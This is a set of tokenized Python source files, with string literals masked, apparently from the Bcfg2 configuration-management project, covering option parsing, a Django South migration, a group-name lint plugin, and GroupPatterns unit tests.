<EOL> Option . __init__ ( self , * args , ** kwargs ) <EOL> def get_environ_value ( self , value ) : <EOL> if value . lower ( ) in [ "<STR_LIT:false>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:0>" ] : <EOL> return False <EOL> elif value . lower ( ) in [ "<STR_LIT:true>" , "<STR_LIT:yes>" , "<STR_LIT>" , "<STR_LIT:1>" ] : <EOL> return True <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % value ) <EOL> def get_config_value ( self , cfp ) : <EOL> """<STR_LIT>""" <EOL> return cfp . getboolean ( * self . cf ) <EOL> class PositionalArgument ( Option ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = '<STR_LIT>' % args [ <NUM_LIT:0> ] <EOL> Option . __init__ ( self , * args , ** kwargs ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . alter_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True , to = orm [ '<STR_LIT>' ] ) ) <EOL> def backwards ( self , orm ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import Bcfg2 . Server . Lint <EOL> class GroupNames ( Bcfg2 . Server . Lint . ServerPlugin ) : <EOL> """<STR_LIT>""" <EOL> pattern = r'<STR_LIT>' <EOL> valid = re . compile ( r'<STR_LIT>' + pattern ) <EOL> def Run ( self ) : <EOL> self . check_metadata ( ) <EOL> if '<STR_LIT>' in self . core . plugins : <EOL> self . check_rules ( ) <EOL> if '<STR_LIT>' in self . core . plugins : <EOL> self . check_bundles ( ) <EOL> if '<STR_LIT>' in self . core . plugins : <EOL> self . check_grouppatterns ( ) <EOL> if '<STR_LIT>' in self . core . plugins : <EOL> self . check_cfg ( ) <EOL> @ classmethod <EOL> def Errors ( cls ) : <EOL> return { "<STR_LIT>" : "<STR_LIT:error>" } <EOL> def check_rules ( self ) : <EOL> """<STR_LIT>""" <EOL> for rules in self . core . plugins [ '<STR_LIT>' ] . entries . values ( ) : <EOL> if not self . HandlesFile ( rules . name ) : <EOL> continue <EOL> xdata = rules . pnode . data <EOL> self . check_entries ( xdata . xpath ( "<STR_LIT>" ) , <EOL> os . path . join ( Bcfg2 . Options . setup . repository , <EOL> rules . name ) ) <EOL> def check_bundles ( self ) : <EOL> """<STR_LIT>""" <EOL> for bundle in self . core . plugins [ '<STR_LIT>' ] . entries . values ( ) : <EOL> if self . HandlesFile ( bundle . name ) and bundle . template is None : <EOL> self . check_entries ( bundle . xdata . xpath ( "<STR_LIT>" ) , <EOL> bundle . name ) <EOL> def check_metadata ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_entries ( self . metadata . groups_xml . xdata . xpath ( "<STR_LIT>" ) , <EOL> os . path . join ( Bcfg2 . Options . setup . repository , <EOL> self . metadata . groups_xml . name ) ) <EOL> def check_grouppatterns ( self ) : <EOL> """<STR_LIT>""" <EOL> cfg = self . core . plugins [ '<STR_LIT>' ] . config <EOL> if not self . HandlesFile ( cfg . name ) : <EOL> return <EOL> for grp in cfg . xdata . xpath ( '<STR_LIT>' ) : <EOL> if not self . valid . search ( grp . text ) : <EOL> self . LintError ( "<STR_LIT>" , <EOL> "<STR_LIT>" % <EOL> ( cfg . name , self . RenderXML ( grp , keep_text = True ) ) ) <EOL> def check_cfg ( self ) : <EOL> """<STR_LIT>""" <EOL> for root , _ , files in os . walk ( self . core . plugins [ '<STR_LIT>' ] . data ) : <EOL> for fname in files : <EOL> basename = os . path . basename ( root ) <EOL> if ( re . search ( r'<STR_LIT>' % basename , fname ) and <EOL> not re . search ( r'<STR_LIT>' % basename + self . pattern , <EOL> fname ) ) : <EOL> self . LintError ( "<STR_LIT>" , <EOL> "<STR_LIT>" % <EOL> os . path . join ( root , fname ) ) <EOL> def check_entries ( self , entries , fname ) : <EOL> """<STR_LIT>""" <EOL> for grp in entries : <EOL> if not self . valid . search ( grp . get ( "<STR_LIT:name>" ) ) : <EOL> self . LintError ( "<STR_LIT>" , <EOL> "<STR_LIT>" % <EOL> ( fname , self . RenderXML ( grp ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from Bcfg2 . Server . Plugins . Cfg . CfgJinja2Generator import CfgJinja2Generator <EOL> from Bcfg2 . Server . Plugins . Cfg . CfgEncryptedGenerator import CfgEncryptedGenerator <EOL> class CfgEncryptedJinja2Generator ( CfgJinja2Generator , CfgEncryptedGenerator ) : <EOL> """<STR_LIT>""" <EOL> __extensions__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> __priority__ = <NUM_LIT:0> <EOL> def handle_event ( self , event ) : <EOL> CfgEncryptedGenerator . handle_event ( self , event ) <EOL> handle_event . __doc__ = CfgEncryptedGenerator . handle_event . __doc__ <EOL> def get_data ( self , entry , metadata ) : <EOL> return CfgJinja2Generator . get_data ( self , entry , metadata ) <EOL> get_data . __doc__ = CfgJinja2Generator . get_data . __doc__ </s>
<s> """<STR_LIT>""" <EOL> import Bcfg2 . Server . Plugin <EOL> class POSIXCompat ( Bcfg2 . Server . Plugin . Plugin , <EOL> Bcfg2 . Server . Plugin . GoalValidator ) : <EOL> """<STR_LIT>""" <EOL> create = False <EOL> def __init__ ( self , core ) : <EOL> Bcfg2 . Server . Plugin . Plugin . __init__ ( self , core ) <EOL> Bcfg2 . Server . Plugin . GoalValidator . __init__ ( self ) <EOL> def validate_goals ( self , metadata , goals ) : <EOL> """<STR_LIT>""" <EOL> if metadata . version_info and metadata . version_info >= ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , '<STR_LIT>' , <NUM_LIT:0> ) : <EOL> return <EOL> for goal in goals : <EOL> for entry in goal . getchildren ( ) : <EOL> if entry . tag == '<STR_LIT>' and '<STR_LIT>' in entry . keys ( ) : <EOL> entry . set ( '<STR_LIT>' , entry . get ( '<STR_LIT>' ) ) </s>
<s> """<STR_LIT>""" <EOL> import lxml . etree <EOL> XI = '<STR_LIT>' <EOL> XI_NAMESPACE = '<STR_LIT>' % XI <EOL> XMLParser = lxml . etree . XMLParser ( remove_blank_text = True ) <EOL> core = None </s>
<s> """<STR_LIT>""" <EOL> from Bcfg2 . Options import Option <EOL> class Two ( object ) : <EOL> """<STR_LIT>""" <EOL> options = [ Option ( '<STR_LIT>' , cf = ( "<STR_LIT>" , "<STR_LIT:test>" ) , dest = "<STR_LIT:test>" , default = "<STR_LIT:bar>" ) ] </s>
<s> import os <EOL> import sys <EOL> import lxml . etree <EOL> import Bcfg2 . Server . Plugin <EOL> from mock import Mock , MagicMock , patch <EOL> from Bcfg2 . Server . Plugins . GroupPatterns import * <EOL> path = os . path . dirname ( __file__ ) <EOL> while path != "<STR_LIT:/>" : <EOL> if os . path . basename ( path ) . lower ( ) . startswith ( "<STR_LIT:test>" ) : <EOL> sys . path . append ( path ) <EOL> if os . path . basename ( path ) == "<STR_LIT>" : <EOL> break <EOL> path = os . path . dirname ( path ) <EOL> from common import * <EOL> from TestPlugin import TestXMLFileBacked , TestPlugin , TestConnector <EOL> class TestPatternMap ( Bcfg2TestCase ) : <EOL> def test_ranges ( self ) : <EOL> """<STR_LIT>""" <EOL> tests = [ ( "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT:foo>" , "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT:foo>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) ] <EOL> groups = MagicMock ( ) <EOL> for rng , inc , exc in tests : <EOL> pmap = PatternMap ( None , rng , groups ) <EOL> for test in inc : <EOL> self . assertEqual ( pmap . process ( test ) , groups ) <EOL> for test in exc : <EOL> self . assertIsNone ( pmap . process ( test ) ) <EOL> def test_simple_patterns ( self ) : <EOL> """<STR_LIT>""" <EOL> tests = [ ( "<STR_LIT>" , <EOL> [ "<STR_LIT:foo>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT:bar>" , "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT:foo>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) ] <EOL> groups = [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ] <EOL> for rng , inc , exc in tests : <EOL> pmap = PatternMap ( rng , None , groups ) <EOL> for test in inc : <EOL> self . assertItemsEqual ( pmap . process ( test ) , groups ) <EOL> for test in exc : <EOL> self . assertIsNone ( pmap . process ( test ) ) <EOL> def test_backref_patterns ( self ) : <EOL> """<STR_LIT>""" <EOL> tests = [ ( "<STR_LIT>" , [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> { "<STR_LIT:foo>" : [ '<STR_LIT:a>' , '<STR_LIT:a>' , '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> "<STR_LIT>" : [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> "<STR_LIT>" : [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } ) , <EOL> ( "<STR_LIT>" , [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> { "<STR_LIT:foo>" : None , <EOL> "<STR_LIT>" : [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:a>' ] , <EOL> "<STR_LIT>" : [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:bar>' ] } ) ] <EOL> for rng , groups , cases in tests : <EOL> pmap = PatternMap ( rng , None , groups ) <EOL> for name , ret in cases . items ( ) : <EOL> if ret is None : <EOL> self . assertIsNone ( pmap . process ( name ) ) <EOL> else : <EOL> self . assertItemsEqual ( pmap . process ( name ) , ret ) <EOL> class TestPatternFile ( TestXMLFileBacked ) : <EOL> test_obj = PatternFile <EOL> should_monitor = True <EOL> def get_obj ( self , path = None , fam = None , core = None , should_monitor = True ) : <EOL> if path is None : <EOL> path = self . path <EOL> if fam and not core : <EOL> core = Mock ( ) <EOL> core . fam = fam <EOL> elif not core : <EOL> core = Mock ( ) <EOL> @ patchIf ( not isinstance ( lxml . etree . Element , Mock ) , <EOL> "<STR_LIT>" , Mock ( ) ) <EOL> def inner ( ) : <EOL> return self . test_obj ( path , core = core ) <EOL> return inner ( ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_Index ( self , mock_PatternMap ) : <EOL> TestXMLFileBacked . test_Index ( self ) <EOL> core = Mock ( ) <EOL> pf = self . get_obj ( core = core ) <EOL> pf . data = """<STR_LIT>""" <EOL> core . metadata_cache_mode = '<STR_LIT>' <EOL> pf . Index ( ) <EOL> core . metadata_cache . expire . assert_called_with ( ) <EOL> self . assertItemsEqual ( mock_PatternMap . call_args_list , <EOL> [ call ( "<STR_LIT>" , None , [ "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> call ( None , "<STR_LIT>" , [ "<STR_LIT>" ] ) ] ) <EOL> def test_process_patterns ( self ) : <EOL> pf = self . get_obj ( ) <EOL> pf . patterns = [ Mock ( ) , Mock ( ) , Mock ( ) ] <EOL> pf . patterns [ <NUM_LIT:0> ] . process . return_value = [ "<STR_LIT:a>" , "<STR_LIT:b>" ] <EOL> pf . patterns [ <NUM_LIT:1> ] . process . return_value = None <EOL> pf . patterns [ <NUM_LIT:2> ] . process . return_value = [ "<STR_LIT:b>" , "<STR_LIT:c>" ] <EOL> self . assertItemsEqual ( pf . process_patterns ( "<STR_LIT>" ) , <EOL> [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:b>" , "<STR_LIT:c>" ] ) <EOL> for pat in pf . patterns : <EOL> pat . process . assert_called_with ( "<STR_LIT>" ) <EOL> class TestGroupPatterns ( TestPlugin , TestConnector ) : <EOL> test_obj = GroupPatterns <EOL> def get_obj ( self , core = None ) : <EOL> @ patchIf ( not isinstance ( lxml . etree . Element , Mock ) , <EOL> "<STR_LIT>" , Mock ( ) ) <EOL> def inner ( ) : <EOL> return TestPlugin . get_obj ( self , core = core ) <EOL> return inner ( ) <EOL> def test_get_additional_groups ( self ) : <EOL> gp = self . get_obj ( ) <EOL> gp . config = Mock ( ) <EOL> metadata = Mock ( ) <EOL> self . assertEqual ( gp . get_additional_groups ( metadata ) , <EOL> gp . config . process_patterns . return_value ) <EOL> gp . config . process_patterns . assert_called_with ( metadata . hostname ) </s>
